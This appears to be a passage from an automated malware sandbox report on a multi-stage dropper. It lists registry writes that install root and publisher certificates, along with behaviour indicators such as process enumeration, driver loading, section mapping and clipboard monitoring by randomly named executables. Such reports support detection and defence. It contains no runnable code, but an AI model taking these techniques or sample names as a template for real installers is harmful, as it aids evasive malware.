6f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5964 PING.EXE 12012 PING.EXE 1452 PING.EXE -
Script User-Agent 11 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 202 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 217 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 229 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 230 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 100 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 149 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 234 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 259 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3424 setups.tmp 3424 setups.tmp 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe 4540 multitimer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2216 Install.exe -
Suspicious behavior: LoadsDriver 7 IoCs
pid Process 5216 dynboTs5K5sKXUxUcUOJZeiw.exe 5216 dynboTs5K5sKXUxUcUOJZeiw.exe 5216 dynboTs5K5sKXUxUcUOJZeiw.exe 5116 6sUPec57VI5dpryixwk9LfT3.exe 5116 6sUPec57VI5dpryixwk9LfT3.exe 5116 6sUPec57VI5dpryixwk9LfT3.exe 1760 app.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4664 MicrosoftEdgeCP.exe 4664 MicrosoftEdgeCP.exe 3340 ao6Cj5ztMuu8mv6NL8w0bG1N.exe 5372 QN1ygxdObN4pGb2PLjmBuRxU.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 5800 Windows Host.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
